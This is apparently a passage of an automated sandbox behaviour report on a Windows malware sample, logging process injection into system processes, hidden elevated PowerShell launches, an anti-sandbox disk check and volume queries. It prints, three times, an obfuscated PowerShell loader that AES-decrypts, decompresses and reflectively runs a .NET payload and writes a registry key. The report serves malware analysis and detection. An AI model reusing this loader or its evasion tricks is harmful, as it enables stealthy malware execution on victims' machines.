        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 1000000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2BE0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: FD0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2DC0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 18D132A0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\cmd.exe base: 1B780BB0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\conhost.exe base: 264072F0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 2C5BFFD0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\svchost.exe base: 1E1AE450000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 15220450000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\more.com base: 234FE4F0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 2693C0E0000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\conhost.exe base: 1AAD1C40000Jump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1A42C600000Jump to behavior
        Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 15220360000Jump to behavior
        Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 15220360000Jump to behavior
        Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 15220360000Jump to behavior
        Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 15220360000Jump to behavior
        Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 15220360000Jump to behavior
        Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 15220360000Jump to behavior
        Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 15220360000Jump to behavior
        Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 15220360000Jump to behavior
        Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 15220360000Jump to behavior
        Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 15220360000Jump to behavior
        Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 15220360000Jump to behavior
        Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 17A37950000Jump to behavior
        Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 17A37950000Jump to behavior
        Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 17A37950000Jump to behavior
        Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 17A37950000Jump to behavior
        Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 17A37950000Jump to behavior
        Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 17A37950000Jump to behavior
        Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 17A37950000Jump to behavior
        Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 17A37950000Jump to behavior
        Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 17A37950000Jump to behavior
        Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 17A37950000Jump to behavior
        Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 17A37950000Jump to behavior
        Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 2C5BFFA0000Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "Start-Process -FilePath 'C:\Users\user\Desktop\skf7iF4.bat' -ArgumentList 'sgcCUaUFtA' -WindowStyle Hidden -Verb RunAs" Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\Desktop\skf7iF4.bat" sgcCUaUFtA Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe "if ((Get-WmiObject Win32_DiskDrive | Select-Object -ExpandProperty Model | findstr /i 'WDS100T2B0A') -and (-not (Get-ChildItem -Path F:\ -Recurse | Where-Object { -not $_.PSIsContainer } | Measure-Object).Count)) {exit 900} else {exit 1}"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function ixMY($RTJl){ Invoke-Expression -Verbose '$lYya=[kQSkQykQstkQekQm.kQSkQekQckQukQrkQikQtkQykQ.kQCrkQykQpkQtokQgrkQakQphkQykQ.kQAekQskQ]:kQ:CkQrkQekQakQtekQ(kQ);'.Replace('kQ', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore -Verbose '$lYya.M7ko7kd7ke=7k[7kSy7ks7kt7ke7km7k.7kS7ke7kc7ku7kri7kt7ky7k.C7kry7kp7kto7kg7kr7kap7kh7ky.7kCi7kp7kh7ke7krM7ko7kd7ke]7k:7k:C7kB7kC;'.Replace('7k', ''); Invoke-Expression -InformationAction Ignore '$lYya.PUPaUPdUPdiUPnUPg=UP[UPSUPyUPsUPtUPeUPmUP.UPSUPecUPuUPrUPitUPy.UPCUPryUPpUPtUPogUPrUPapUPhyUP.UPPUPaUPddUPiUPnUPgMUPoUPdeUP]UP::UPPUPKUPCUPS7UP;'.Replace('UP', ''); Invoke-Expression -Verbose '$lYya.KF4eF4yF4=[F4SF4ysF4tF4eF4mF4.F4CF4oF4nF4vF4eF4rtF4]F4:F4:FF4roF4mF4BaF4sF4eF464F4SF4trF4inF4g("6F4iF4nF4QTF4VF4f6F4kF4MF4fF4iF4uF49F40F4mF4wF4KaF4ZF48F4tDF482F4BF4yTF4DF4CF4HNF4RF4PsF4BFF42F4gF4fF4mFF4QF4=");'.Replace('F4', ''); Invoke-Expression -Debug -Verbose -InformationAction Ignore -WarningAction Inquire '$lYya.IcuVcu=cu[Scuycustcuecumcu.cuCcuocuncuvcuecurcut]cu:cu:cuFrcuomcuBcuascuecu6cu4Scutcuricungcu("OcuQcufcuEscuocuBxcu6cufcuucuHcuocuGcu2cuocu+cubrcu8curcuQ=cu=");'.Replace('cu', ''); $kxIY=$lYya.CreateDecryptor(); $uoEQ=$kxIY.TransformFinalBlock($RTJl, 0, $RTJl.Length); $kxIY.Dispose(); $lYya.Dispose(); $uoEQ;}function eaLU($RTJl){ Invoke-Expression -Debug -Verbose -WarningAction Inquire -InformationAction Ignore '$QqUU=NgZegZwgZ-OgZbgZjegZcgZtgZ gZSgZygZsgZtgZegZmgZ.IgZOgZ.gZMegZmogZrgZySgZtgZrgZeagZm(,$RTJl);'.Replace('gZ', ''); Invoke-Expression -WarningAction Inquire '$JLmq=NgZegZwgZ-OgZbgZjegZcgZtgZ gZSgZygZsgZtgZegZmgZ.IgZOgZ.gZMegZmogZrgZySgZtgZrgZeagZm;'.Replace('gZ', ''); Invoke-Expression -Debug -WarningAction Inquire -Verbose -InformationAction Ignore '$FcOM=NJVeJVwJV-OJVbJVjeJVcJVtJV JVSJVyJVsJVtJVeJVmJV.IJVOJV.JVCoJVmpJVrJVesJVsJViJVonJV.JVGZJVipJVSJVtJVrJVeaJVmJV($QqUU, [JVIJVOJV.CJVoJVmpJVrJVeJVsJVsJViJVoJVnJV.JVCJVomJVpJVrJVesJVsiJVoJVnMJVoJVdJVe]JV:JV:DJVecJVoJVmJVpJVreJVsJVs);'.Replace('JV', ''); $FcOM.CopyTo($JLmq); $FcOM.Dispose(); $QqUU.Dispose(); $JLmq.Dispose(); $JLmq.ToArray();}function asdm($RTJl,$dnWr){ Invoke-Expression -InformationAction Ignore -Verbose -Debug '$UMjh=[imSimyimstimeimm.imRimeimfimlimeimcimtimiimoimn.imAimsimseimmbimlimy]im:im:imLoimaimd([byte[]]$RTJl);'.Replace('im', ''); Invoke-Expression -InformationAction Ignore -Verbose -WarningAction Inquire -Debug '$mtQH=$UMjh.EIAnIAtIAryIAPIAoiIAnIAtIA;'.Replace('IA', ''); Invoke-Expression -Verbose -InformationAction Ignore -WarningAction Inquire -Debug '$mtQH.7yI7yn7yvo7yk7ye(7y$7yn7yu7yl7yl7y, $dnWr);'.Replace('7y', '');}function rfR($wdZq){ $registryPath = 'HKLM:\SOFTWARE\OOhhhm='; if (Test-Path $registryPath) { Remove-ItemProperty -Path $registryPath -Name * -Force } else { New-Item -Path $registryPath -Force; } Set-ItemProperty -Path $registryPath -Name 'Map' -Value 'YgRcXRGuMxdAM;gxWdtVB;oXRuvWNbWJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -NoProfileJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\more.com moreJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\findstr.exe "C:\Windows\system32\findstr.exe" /i WDS100T2B0AJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe "if ((get-wmiobject win32_diskdrive | select-object -expandproperty model | findstr /i 'wds100t2b0a') -and (-not (get-childitem -path f:\ -recurse | where-object { -not $_.psiscontainer } | measure-object).count)) {exit 900} else {exit 1}"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function ixmy($rtjl){ invoke-expression -verbose '$lyya=[kqskqykqstkqekqm.kqskqekqckqukqrkqikqtkqykq.kqcrkqykqpkqtokqgrkqakqphkqykq.kqaekqskq]:kq:ckqrkqekqakqtekq(kq);'.replace('kq', ''); invoke-expression -warningaction inquire -debug -informationaction ignore -verbose '$lyya.m7ko7kd7ke=7k[7ksy7ks7kt7ke7km7k.7ks7ke7kc7ku7kri7kt7ky7k.c7kry7kp7kto7kg7kr7kap7kh7ky.7kci7kp7kh7ke7krm7ko7kd7ke]7k:7k:c7kb7kc;'.replace('7k', ''); invoke-expression -informationaction ignore '$lyya.pupaupdupdiupnupg=up[upsupyupsuptupeupmup.upsupecupuuprupitupy.upcupryuppuptupoguprupapuphyup.uppupaupddupiupnupgmupoupdeup]up::uppupkupcups7up;'.replace('up', ''); invoke-expression -verbose '$lyya.kf4ef4yf4=[f4sf4ysf4tf4ef4mf4.f4cf4of4nf4vf4ef4rtf4]f4:f4:ff4rof4mf4baf4sf4ef464f4sf4trf4inf4g("6f4if4nf4qtf4vf4f6f4kf4mf4ff4if4uf49f40f4mf4wf4kaf4zf48f4tdf482f4bf4ytf4df4cf4hnf4rf4psf4bff42f4gf4ff4mff4qf4=");'.replace('f4', ''); invoke-expression -debug -verbose -informationaction ignore -warningaction inquire '$lyya.icuvcu=cu[scuycustcuecumcu.cuccuocuncuvcuecurcut]cu:cu:cufrcuomcubcuascuecu6cu4scutcuricungcu("ocuqcufcuescuocubxcu6cufcuucuhcuocugcu2cuocu+cubrcu8curcuq=cu=");'.replace('cu', ''); $kxiy=$lyya.createdecryptor(); $uoeq=$kxiy.transformfinalblock($rtjl, 0, $rtjl.length); $kxiy.dispose(); $lyya.dispose(); $uoeq;}function ealu($rtjl){ invoke-expression -debug -verbose -warningaction inquire -informationaction ignore '$qquu=ngzegzwgz-ogzbgzjegzcgztgz gzsgzygzsgztgzegzmgz.igzogz.gzmegzmogzrgzysgztgzrgzeagzm(,$rtjl);'.replace('gz', ''); invoke-expression -warningaction inquire '$jlmq=ngzegzwgz-ogzbgzjegzcgztgz gzsgzygzsgztgzegzmgz.igzogz.gzmegzmogzrgzysgztgzrgzeagzm;'.replace('gz', ''); invoke-expression -debug -warningaction inquire -verbose -informationaction ignore '$fcom=njvejvwjv-ojvbjvjejvcjvtjv jvsjvyjvsjvtjvejvmjv.ijvojv.jvcojvmpjvrjvesjvsjvijvonjv.jvgzjvipjvsjvtjvrjveajvmjv($qquu, [jvijvojv.cjvojvmpjvrjvejvsjvsjvijvojvnjv.jvcjvomjvpjvrjvesjvsijvojvnmjvojvdjve]jv:jv:djvecjvojvmjvpjvrejvsjvs);'.replace('jv', ''); $fcom.copyto($jlmq); $fcom.dispose(); $qquu.dispose(); $jlmq.dispose(); $jlmq.toarray();}function asdm($rtjl,$dnwr){ invoke-expression -informationaction ignore -verbose -debug '$umjh=[imsimyimstimeimm.imrimeimfimlimeimcimtimiimoimn.imaimsimseimmbimlimy]im:im:imloimaimd([byte[]]$rtjl);'.replace('im', ''); invoke-expression -informationaction ignore -verbose -warningaction inquire -debug '$mtqh=$umjh.eianiatiaryiapiaoiianiatia;'.replace('ia', ''); invoke-expression -verbose -informationaction ignore -warningaction inquire -debug '$mtqh.7yi7yn7yvo7yk7ye(7y$7yn7yu7yl7yl7y, $dnwr);'.replace('7y', '');}function rfr($wdzq){ $registrypath = 'hklm:\software\oohhhm='; if (test-path $registrypath) { remove-itemproperty -path $registrypath -name * -force } else { new-item -path $registrypath -force; } set-itemproperty -path $registrypath -name 'map' -value 'ygrcxrgumxdam;gxwdtvb;oxruvwnbw
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe "if ((get-wmiobject win32_diskdrive | select-object -expandproperty model | findstr /i 'wds100t2b0a') -and (-not (get-childitem -path f:\ -recurse | where-object { -not $_.psiscontainer } | measure-object).count)) {exit 900} else {exit 1}"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function ixmy($rtjl){ invoke-expression -verbose '$lyya=[kqskqykqstkqekqm.kqskqekqckqukqrkqikqtkqykq.kqcrkqykqpkqtokqgrkqakqphkqykq.kqaekqskq]:kq:ckqrkqekqakqtekq(kq);'.replace('kq', ''); invoke-expression -warningaction inquire -debug -informationaction ignore -verbose '$lyya.m7ko7kd7ke=7k[7ksy7ks7kt7ke7km7k.7ks7ke7kc7ku7kri7kt7ky7k.c7kry7kp7kto7kg7kr7kap7kh7ky.7kci7kp7kh7ke7krm7ko7kd7ke]7k:7k:c7kb7kc;'.replace('7k', ''); invoke-expression -informationaction ignore '$lyya.pupaupdupdiupnupg=up[upsupyupsuptupeupmup.upsupecupuuprupitupy.upcupryuppuptupoguprupapuphyup.uppupaupddupiupnupgmupoupdeup]up::uppupkupcups7up;'.replace('up', ''); invoke-expression -verbose '$lyya.kf4ef4yf4=[f4sf4ysf4tf4ef4mf4.f4cf4of4nf4vf4ef4rtf4]f4:f4:ff4rof4mf4baf4sf4ef464f4sf4trf4inf4g("6f4if4nf4qtf4vf4f6f4kf4mf4ff4if4uf49f40f4mf4wf4kaf4zf48f4tdf482f4bf4ytf4df4cf4hnf4rf4psf4bff42f4gf4ff4mff4qf4=");'.replace('f4', ''); invoke-expression -debug -verbose -informationaction ignore -warningaction inquire '$lyya.icuvcu=cu[scuycustcuecumcu.cuccuocuncuvcuecurcut]cu:cu:cufrcuomcubcuascuecu6cu4scutcuricungcu("ocuqcufcuescuocubxcu6cufcuucuhcuocugcu2cuocu+cubrcu8curcuq=cu=");'.replace('cu', ''); $kxiy=$lyya.createdecryptor(); $uoeq=$kxiy.transformfinalblock($rtjl, 0, $rtjl.length); $kxiy.dispose(); $lyya.dispose(); $uoeq;}function ealu($rtjl){ invoke-expression -debug -verbose -warningaction inquire -informationaction ignore '$qquu=ngzegzwgz-ogzbgzjegzcgztgz gzsgzygzsgztgzegzmgz.igzogz.gzmegzmogzrgzysgztgzrgzeagzm(,$rtjl);'.replace('gz', ''); invoke-expression -warningaction inquire '$jlmq=ngzegzwgz-ogzbgzjegzcgztgz gzsgzygzsgztgzegzmgz.igzogz.gzmegzmogzrgzysgztgzrgzeagzm;'.replace('gz', ''); invoke-expression -debug -warningaction inquire -verbose -informationaction ignore '$fcom=njvejvwjv-ojvbjvjejvcjvtjv jvsjvyjvsjvtjvejvmjv.ijvojv.jvcojvmpjvrjvesjvsjvijvonjv.jvgzjvipjvsjvtjvrjveajvmjv($qquu, [jvijvojv.cjvojvmpjvrjvejvsjvsjvijvojvnjv.jvcjvomjvpjvrjvesjvsijvojvnmjvojvdjve]jv:jv:djvecjvojvmjvpjvrejvsjvs);'.replace('jv', ''); $fcom.copyto($jlmq); $fcom.dispose(); $qquu.dispose(); $jlmq.dispose(); $jlmq.toarray();}function asdm($rtjl,$dnwr){ invoke-expression -informationaction ignore -verbose -debug '$umjh=[imsimyimstimeimm.imrimeimfimlimeimcimtimiimoimn.imaimsimseimmbimlimy]im:im:imloimaimd([byte[]]$rtjl);'.replace('im', ''); invoke-expression -informationaction ignore -verbose -warningaction inquire -debug '$mtqh=$umjh.eianiatiaryiapiaoiianiatia;'.replace('ia', ''); invoke-expression -verbose -informationaction ignore -warningaction inquire -debug '$mtqh.7yi7yn7yvo7yk7ye(7y$7yn7yu7yl7yl7y, $dnwr);'.replace('7y', '');}function rfr($wdzq){ $registrypath = 'hklm:\software\oohhhm='; if (test-path $registrypath) { remove-itemproperty -path $registrypath -name * -force } else { new-item -path $registrypath -force; } set-itemproperty -path $registrypath -name 'map' -value 'ygrcxrgumxdam;gxwdtvb;oxruvwnbwJump to behavior
        Source: conhost.exe, 00000005.00000002.2523666714.0000026405DE1000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.2568365283.0000015206321000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000011.00000000.1495603733.000001B9280E1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
        Source: conhost.exe, 00000005.00000002.2523666714.0000026405DE1000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.2568365283.0000015206321000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000011.00000000.1495603733.000001B9280E1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
        Source: conhost.exe, 00000005.00000002.2523666714.0000026405DE1000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.2568365283.0000015206321000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000011.00000000.1495603733.000001B9280E1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program ManagerW
        Source: conhost.exe, 00000005.00000002.2523666714.0000026405DE1000.00000002.00000001.00040000.00000000.sdmp, powershell.exe, 0000000F.00000002.2568365283.0000015206321000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000011.00000000.1495603733.000001B9280E1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
        Source: dwm.exe, 00000014.00000002.2633502776.000001F086CA8000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 00000014.00000000.1514567480.000001F086CA8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Program Managerz
        Source: C:\Windows\System32\cmd.exeCode function: 4_3_000001B780BC45D0 cpuid 4_3_000001B780BC45D0
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
